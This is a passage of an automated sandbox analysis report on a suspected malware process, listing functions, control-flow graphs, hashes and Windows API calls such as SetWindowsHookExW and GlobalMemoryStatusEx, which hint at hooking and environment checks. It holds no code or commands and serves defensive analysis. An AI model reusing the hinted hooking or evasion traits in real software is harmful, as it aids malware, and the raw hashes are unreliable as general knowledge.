                                control_flow_graph 375 6ca5f60-6ca5f6b 376 6ca5f6d-6ca5f94 call 6ca41e4 375->376 377 6ca5f95-6ca5fb4 call 6ca41f0 375->377 383 6ca5fba-6ca6019 377->383 384 6ca5fb6-6ca5fb9 377->384 390 6ca601b-6ca601e 383->390 391 6ca601f-6ca60ac GlobalMemoryStatusEx 383->391 394 6ca60ae-6ca60b4 391->394 395 6ca60b5-6ca60dd 391->395 394->395
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2753183487.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6ca0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: bafdd1838b338705063b8f783d336835040c3a20efe43218a1700751280417ef
                                • Instruction ID: debaa9bb6a3c96fb9d1d2f06460ecc7b601404d5a6efc4fc0329e428f0ca0d48
                                • Opcode Fuzzy Hash: bafdd1838b338705063b8f783d336835040c3a20efe43218a1700751280417ef
                                • Instruction Fuzzy Hash: BF4124B2D0074A9FCB14DFAAD80479EBBF1BF89210F15856AD508E7340DB749885CBE1
                                Function 05D88C50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 398 5d88c50-5d88c75 call 5d8781c 401 5d88c8a-5d88d1c CreateIconFromResourceEx 398->401 402 5d88c77-5d88c87 call 5d88710 398->402 407 5d88d1e-5d88d24 401->407 408 5d88d25-5d88d42 401->408 407->408
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2752149915.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5d80000_GeUT.jbxd
                                Similarity
                                • API ID: CreateFromIconResource
                                • String ID: _? >
                                • API String ID: 3668623891-3388496716
                                • Opcode ID: e35c929ddab48bae27baeb10add10dc34742e2522df4a91ecf0d4af868d390d1
                                • Instruction ID: 56c886c99c70518019926605aee43527e50734572f5f0c627e1af648257dab7d
                                • Opcode Fuzzy Hash: e35c929ddab48bae27baeb10add10dc34742e2522df4a91ecf0d4af868d390d1
                                • Instruction Fuzzy Hash: 1231897290434D9FCB11DFA9C844AEEBFF9EF09310F14845AEA54A7261C339A950DFA1
                                Function 01238B54 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 411 1238b54-123914c DuplicateHandle 413 1239155-1239172 411->413 414 123914e-1239154 411->414 414->413
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0123907E,?,?,?,?,?), ref: 0123913F
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2741440310.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_1230000_GeUT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID: _? >
                                • API String ID: 3793708945-3388496716
                                • Opcode ID: cffb787fbc0d7622bee70eaab7ab0482dac375df9d1f89f9989a056a9cdaadd8
                                • Instruction ID: 50acd5a8e938825ce9a9abebf4d04dacc26c9406cefac4901bd4ddefde467cc8
                                • Opcode Fuzzy Hash: cffb787fbc0d7622bee70eaab7ab0482dac375df9d1f89f9989a056a9cdaadd8
                                • Instruction Fuzzy Hash: 8C21E3B59003099FDB10DFAAD884ADEFBF9FB49310F14801AE958A3350D375A954CFA5
                                Function 012390B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 417 12390b0-12390b3 418 12390b8-123914c DuplicateHandle 417->418 419 1239155-1239172 418->419 420 123914e-1239154 418->420 420->419
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0123907E,?,?,?,?,?), ref: 0123913F
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2741440310.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_1230000_GeUT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID: _? >
                                • API String ID: 3793708945-3388496716
                                • Opcode ID: cfb354c94cd75f606ceec24d4280b443ae49d983f799123aa621d70931309e86
                                • Instruction ID: 2ae3c17b1ce2859920135007634536210177639e97c4a2b2f254d0243e1ad029
                                • Opcode Fuzzy Hash: cfb354c94cd75f606ceec24d4280b443ae49d983f799123aa621d70931309e86
                                • Instruction Fuzzy Hash: 3421E3B59002099FDB10DFAAD884BDEBBF9FB48724F14801AE958A3350D374A944CF65
                                Function 01233BF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 423 1233bf0-1233c42 425 1233c44 423->425 426 1233c4e-1233c80 SetWindowsHookExW 423->426 429 1233c4c 425->429 427 1233c82-1233c88 426->427 428 1233c89-1233cae 426->428 427->428 429->426
                                APIs
                                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01233C73
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2741440310.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_1230000_GeUT.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID: _? >
                                • API String ID: 2559412058-3388496716
                                • Opcode ID: a897f441d019aa49cfd3cb97b108f04d98a8d6e149aa462318c68d79521d580c
                                • Instruction ID: 1781b04dae4dabd5e45108742cdef47599c865cb32badf101945b994490dd614
                                • Opcode Fuzzy Hash: a897f441d019aa49cfd3cb97b108f04d98a8d6e149aa462318c68d79521d580c
                                • Instruction Fuzzy Hash: 012137B5D002098FDB14DFAAC844BDEBBF5BF88310F108829D519A7250C7749A44CFA0
                                Function 01233BF8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 433 1233bf8-1233c42 435 1233c44 433->435 436 1233c4e-1233c80 SetWindowsHookExW 433->436 439 1233c4c 435->439 437 1233c82-1233c88 436->437 438 1233c89-1233cae 436->438 437->438 439->436
                                APIs
                                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01233C73
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2741440310.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_1230000_GeUT.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID: _? >
                                • API String ID: 2559412058-3388496716
                                • Opcode ID: b653ab96e6e51b71a595163a574ceda9ca4873c82987f0288122f136dccb0989
                                • Instruction ID: 05d0c3aaca8c9233c0e931ba61a9bedaf7d751a35596b0334ceb4fd07623f35f
                                • Opcode Fuzzy Hash: b653ab96e6e51b71a595163a574ceda9ca4873c82987f0288122f136dccb0989
                                • Instruction Fuzzy Hash: 7F2127B5D002099FDB14DFAAC844BDEFBF5BF88310F108429D519A7250C775AA44CFA4
                                Function 05D8781C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56windowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 443 5d8781c-5d88d1c CreateIconFromResourceEx 445 5d88d1e-5d88d24 443->445 446 5d88d25-5d88d42 443->446 445->446
                                APIs
                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,05D88C6A,?,?,?,?,?), ref: 05D88D0F
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2752149915.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5d80000_GeUT.jbxd
                                Similarity
                                • API ID: CreateFromIconResource
                                • String ID: _? >
                                • API String ID: 3668623891-3388496716
                                • Opcode ID: 2b7577e78afedcf5c6493ca9bd19fd7542e5c3d6637ed3e898db7fe7757f1dae
                                • Instruction ID: ab0e5d90efa57ebb51b84096c6b9403de337e9f4b3279c50cf0e853b0aae7642
                                • Opcode Fuzzy Hash: 2b7577e78afedcf5c6493ca9bd19fd7542e5c3d6637ed3e898db7fe7757f1dae
                                • Instruction Fuzzy Hash: B61126B580034D9FDB20DFAAC844BEEBFF9EB48320F54841AE954A7250C375A950DFA4
                                Function 06CA41F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 449 6ca41f0-6ca60ac GlobalMemoryStatusEx 452 6ca60ae-6ca60b4 449->452 453 6ca60b5-6ca60dd 449->453 452->453
                                APIs
                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06CA5FB2), ref: 06CA609F
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2753183487.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6ca0000_GeUT.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID: _? >
                                • API String ID: 1890195054-3388496716
                                • Opcode ID: d1ec42ea7d944406ecaa2e9ff0ae28ffba93d02089af18b6b20391608fae98e4
                                • Instruction ID: bcce9e83dec0c6db208f8e3977246f3bcbbb1d3bd378709ce3f94fe1f54aac4d
                                • Opcode Fuzzy Hash: d1ec42ea7d944406ecaa2e9ff0ae28ffba93d02089af18b6b20391608fae98e4
                                • Instruction Fuzzy Hash: A91144B1C0065A9FDB10DFAAC444B9EFBF4BF48320F14816AE918A7240D378A944CFA5
                                Function 05D8C608 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52windowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 456 5d8c608-5d8c67a PostMessageW 458 5d8c67c-5d8c682 456->458 459 5d8c683-5d8c6a4 456->459 458->459
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 05D8C66D
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2752149915.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5d80000_GeUT.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID: _? >
                                • API String ID: 410705778-3388496716
                                • Opcode ID: a3f6a70974b067939231bb63a53d1cee7f811a6569ae9f7ddeeab061477a5bcd
                                • Instruction ID: 71de4c9f5d0ed6c82960c58768d556011b54ca84b08fc19e86099dd642285de6
                                • Opcode Fuzzy Hash: a3f6a70974b067939231bb63a53d1cee7f811a6569ae9f7ddeeab061477a5bcd
                                • Instruction Fuzzy Hash: 5A1128B5800309DFDB10DF9AC845BEEBBF8FB48720F10842AE558A3251D378A944CFA5
                                Function 05D8C610 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48windowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 461 5d8c610-5d8c67a PostMessageW 462 5d8c67c-5d8c682 461->462 463 5d8c683-5d8c6a4 461->463 462->463
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 05D8C66D
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2752149915.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5d80000_GeUT.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID: _? >
                                • API String ID: 410705778-3388496716
                                • Opcode ID: ad0f348149199a57b6894e8e725370a1150fab39b9ff995a5684c241cd06347f
                                • Instruction ID: 3baeb50be98228330ffa5d9086880c108f72397e2882e45784ec83e02f3eb660
                                • Opcode Fuzzy Hash: ad0f348149199a57b6894e8e725370a1150fab39b9ff995a5684c241cd06347f
                                • Instruction Fuzzy Hash: B411F5B5800349DFDB10DF9AC845BEEBBF8FB48720F10842AE558A7251D378A944CFA5
                                Function 05D87860 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,?,?,?), ref: 05D8906D
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2752149915.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5d80000_GeUT.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: _? >
                                • API String ID: 3850602802-3388496716
                                • Opcode ID: fd706d69b46db8c1b4859007d1f3d9b0def0c3f46ef3b3cf5f731d10e0042f26
                                • Instruction ID: b8f0d8641b0c05e812723904104d53b8b1ef6bff3806e17770d829d02568da9d
                                • Opcode Fuzzy Hash: fd706d69b46db8c1b4859007d1f3d9b0def0c3f46ef3b3cf5f731d10e0042f26
                                • Instruction Fuzzy Hash: 4911F8B58003499FDB20DF9AD845BEEBBF8FB48310F10841AE559A7241C375A944CFA5
                                Function 05D89008 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,?,?,?), ref: 05D8906D
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2752149915.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5d80000_GeUT.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: _? >
                                • API String ID: 3850602802-3388496716
                                • Opcode ID: 4fb8a2b3aedce6910c10be843c52a57040d87dd45db9e1aff5af06f531008cf4
                                • Instruction ID: 26a02e6b2212e499170638ce2ece5842b23cf222508ffbfbcffc3d0713778042
                                • Opcode Fuzzy Hash: 4fb8a2b3aedce6910c10be843c52a57040d87dd45db9e1aff5af06f531008cf4
                                • Instruction Fuzzy Hash: B211D6B68003499FDB10DF9AD885BEEBBF8FB48720F10841AE558A7340C375A544CFA5
                                Function 07CBAC98 Relevance: 2.8, Strings: 2, Instructions: 263COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: |75t$[~6k^
                                • API String ID: 0-4069473154
                                • Opcode ID: 0da1c3281c2b7ccdfd81c73d8e2c24d2c9c524fe53191a70fca69f1b0433e283
                                • Instruction ID: de06e1baf112e2955e898c3c5225cbca52bc6a5abdb9cbb59f7b52eb5c1f56f8
                                • Opcode Fuzzy Hash: 0da1c3281c2b7ccdfd81c73d8e2c24d2c9c524fe53191a70fca69f1b0433e283
                                • Instruction Fuzzy Hash: 9ED164B4E00219DFDB54DFA9C984A9DBBB1FF48310F1081A9E819A7355DB30AE85CF51
                                Function 07CFBE99 Relevance: 2.0, Strings: 1, Instructions: 713COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757700715.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cf0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: |k.t
                                • API String ID: 0-406870256
                                • Opcode ID: 85b846f45f9c22ff34c037cde83123430442c0cfbbf434a500712c0f88ef8126
                                • Instruction ID: 3cad329bbe7d9450fecee012f1a6aaeaab41af7171f9c3d637251cf137cc002b
                                • Opcode Fuzzy Hash: 85b846f45f9c22ff34c037cde83123430442c0cfbbf434a500712c0f88ef8126
                                • Instruction Fuzzy Hash: 93825274A01229CFDB64DF69C884BD9BBB1BF49301F1481EAD909A7361DB309E85CF91
                                Function 07CB9D21 Relevance: 1.8, Strings: 1, Instructions: 541COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-980617297
                                • Opcode ID: f84aac9300c7c95f696b75af2f2fbecf52da13224c0f046c81ef029a5adb7c03
                                • Instruction ID: a316377abbb9ac5480250b90aec3f823e04590cb9f552e9c215fb37ffc45967b
                                • Opcode Fuzzy Hash: f84aac9300c7c95f696b75af2f2fbecf52da13224c0f046c81ef029a5adb7c03
                                • Instruction Fuzzy Hash: 3542F3B0901245CFE724DF98D688B8EBBF1FF1431AF19C098E048AB262C775D94ACB55
                                Function 07CB9D30 Relevance: 1.7, Strings: 1, Instructions: 486COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-980617297
                                • Opcode ID: 95c9855448bc4db147b392d39868e396e768c6ef4f8c42dda135839b34d25d25
                                • Instruction ID: 648c52785d18d75f6c218e85ada204ced1062c709fbbb2a0fbaf686b1b2f9bc0
                                • Opcode Fuzzy Hash: 95c9855448bc4db147b392d39868e396e768c6ef4f8c42dda135839b34d25d25
                                • Instruction Fuzzy Hash: 0832D3B0901245DFE720DF98D688B8EBBF6FF1431AF1AC058E048AB262C775D949CB55
                                Function 07CF4BD8 Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757700715.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cf0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: L<5t
                                • API String ID: 0-682513406
                                • Opcode ID: c340247e37a4f684ad643f766bd7b6af25db0bb8a5fe8052e9a9ba097dcbbb8c
                                • Instruction ID: 3c5489d68b2cd6f29154b5f145b938abc720b0b75a6f8c0e54dc70bb321d0ef1
                                • Opcode Fuzzy Hash: c340247e37a4f684ad643f766bd7b6af25db0bb8a5fe8052e9a9ba097dcbbb8c
                                • Instruction Fuzzy Hash: B8B1E3B4E01219CFCB68DFA4D884A9DBBB2BF89300F208169D419AB355DB315E85CF40
                                Function 07D115F8 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757880139.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7d10000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: (
                                • API String ID: 0-3887548279
                                • Opcode ID: ed2e7bbc7a4bf01decdb6f8366e1fcb2854a929b8ab1d97aae6516a023cf64df
                                • Instruction ID: f87c5573f8b40c03eba54e846aa753d049f1309e03a493b0b2eab110233b49c3
                                • Opcode Fuzzy Hash: ed2e7bbc7a4bf01decdb6f8366e1fcb2854a929b8ab1d97aae6516a023cf64df
                                • Instruction Fuzzy Hash: 58814AB5A0021ADFCB04DFA8D4849AEFBB1FF89311F148169E915AB351D735AC52CF90
                                Function 07CB0B2C Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: 883394b71fcc1f5090fce4708adb471ccbaa58b6c21302ca89e97886288048a9
                                • Instruction ID: 1cf97bcd87e0a6f31bab3fcab1deeb92df94f8aecea64e496533492997f28342
                                • Opcode Fuzzy Hash: 883394b71fcc1f5090fce4708adb471ccbaa58b6c21302ca89e97886288048a9
                                • Instruction Fuzzy Hash: E56104B1D0021DDFDB24DFA9C984ADEBBB5BF48304F20816AE805BB251DB75A945CF90
                                Function 07CB0B38 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: ae16464b536b5ce6915000c2230fec04a5992d2d60a5d178954d15919bc5ab41
                                • Instruction ID: 407b847b2cf36f903a5f311f54ca6a56374a0aec1215d20181a4b628ba3fd5aa
                                • Opcode Fuzzy Hash: ae16464b536b5ce6915000c2230fec04a5992d2d60a5d178954d15919bc5ab41
                                • Instruction Fuzzy Hash: B151F4B1D0021DCFDB24DFA9C884ADEBBB5BF48304F20816AE805BB255DB75A945CF90
                                Function 07CB15F0 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: ec83774e678c000bf9a6d9783929e3356bc927bf0cfb6d2d3b2b308fd5b8df02
                                • Instruction ID: 40e6287adb2d747714a52bff6d53b1c873e9955ad6a5527e0e25c0a8097209b4
                                • Opcode Fuzzy Hash: ec83774e678c000bf9a6d9783929e3356bc927bf0cfb6d2d3b2b308fd5b8df02
                                • Instruction Fuzzy Hash: 9E21F3B5D012199FCB20DF9AD484BDEFBF4EF48720F14806AE818AB241D7749A44CFA4
                                Function 07CF2098 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757700715.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cf0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: 1aabf8d23150f7d2d4c654ebfe65697a0529eb7466aa70b15a0cc6fd111ea2b3
                                • Instruction ID: b965f137992c2a141c5a3df00042b2477be40456444023c5a2a40f6c48720ed5
                                • Opcode Fuzzy Hash: 1aabf8d23150f7d2d4c654ebfe65697a0529eb7466aa70b15a0cc6fd111ea2b3
                                • Instruction Fuzzy Hash: 7621D4B5E002198FCB45CFA9D880AEEBBB1FB88210F10856AD514B7354D7745A45CFA1
                                Function 07CB0480 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: 893141e829d54ff37e2a983195d21d7bc8731a71d89c997d91e73451224e4334
                                • Instruction ID: 0d7f4be3509999f6765794e4f1936d0e92be1f65d0d10ae95de8c468220cae68
                                • Opcode Fuzzy Hash: 893141e829d54ff37e2a983195d21d7bc8731a71d89c997d91e73451224e4334
                                • Instruction Fuzzy Hash: 4921F5B1D012199FCB20DF9AD484BDEFBF4EF48710F14806AE818AB245D7749A44CFA4
                                Function 07CF20A8 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757700715.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cf0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: 4f3b48b18720897c55396ce2025ba051c6825432d248b7b79e8ba47c1b82d433
                                • Instruction ID: 88da733e82c6edfa70917db005ec1a0a4893f57ab50a43ba4ff86db9fcaa4b16
                                • Opcode Fuzzy Hash: 4f3b48b18720897c55396ce2025ba051c6825432d248b7b79e8ba47c1b82d433
                                • Instruction Fuzzy Hash: F521C5B5E002199FCF44DFA9D880AEEBBF5FB88210F10816AD514B7354D774AA41CFA0
                                Function 07CB7911 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: d0b0f1ddf0c4225e239aa14a3557717b5220ccf5aa6b9eb1ec2ca33da5d1452d
                                • Instruction ID: 1f28617e4b8e8be1faad05009bf5713cf26a1c0ec666bb8cc8850c6015ba479e
                                • Opcode Fuzzy Hash: d0b0f1ddf0c4225e239aa14a3557717b5220ccf5aa6b9eb1ec2ca33da5d1452d
                                • Instruction Fuzzy Hash: FC21C2B1D01219AFDB10DF9AD884ADEFBF4FB48714F10812AE918A7240C3746954CFA5
                                Function 07CB059C Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: 0cdb83d390f151eb20f428a7b433ee9899febdf46a183a86c61fbde4576a15bd
                                • Instruction ID: ba0c6e34b375421b45048eea537a84ded9e5a4fc231b708e045db5ea82296f62
                                • Opcode Fuzzy Hash: 0cdb83d390f151eb20f428a7b433ee9899febdf46a183a86c61fbde4576a15bd
                                • Instruction Fuzzy Hash: A821C2B1D01219AFDB10DFAAD884ADEFBF4FB48310F10852AE918A7240C374A954CFA5
                                Function 07D14FE8 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757880139.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7d10000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: 89098fac15996db15187cf40de239c69d5b5bc1f4b2318c8dff086fbca00a496
                                • Instruction ID: 05e7a599302aa02dd437e107adea4865e14c28f6668c1df367ada6897be4ad5c
                                • Opcode Fuzzy Hash: 89098fac15996db15187cf40de239c69d5b5bc1f4b2318c8dff086fbca00a496
                                • Instruction Fuzzy Hash: 141100B580074A8FDB20DF9AD884BDEFBF4AB48320F208459D519A3691C379A944CFA5
                                Function 07D14FF0 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757880139.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7d10000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: dc41a284992bc3f552cdc599c20fad9d0581ac8e34d90dca053e1fd103c84c02
                                • Instruction ID: c0939d84783edb801e964b2b97cfb709ad2c7e30891b21ff81a9a742a5979baa
                                • Opcode Fuzzy Hash: dc41a284992bc3f552cdc599c20fad9d0581ac8e34d90dca053e1fd103c84c02
                                • Instruction Fuzzy Hash: 00111EB580034A8FCB20DF9AD884BDEFBF4EB48320F208419D519A3340C379A944CFA1
                                Function 07A3C5F0 Relevance: 1.1, Instructions: 1078COMMON
                                Download Yara Rule
                                Memory Dump Source
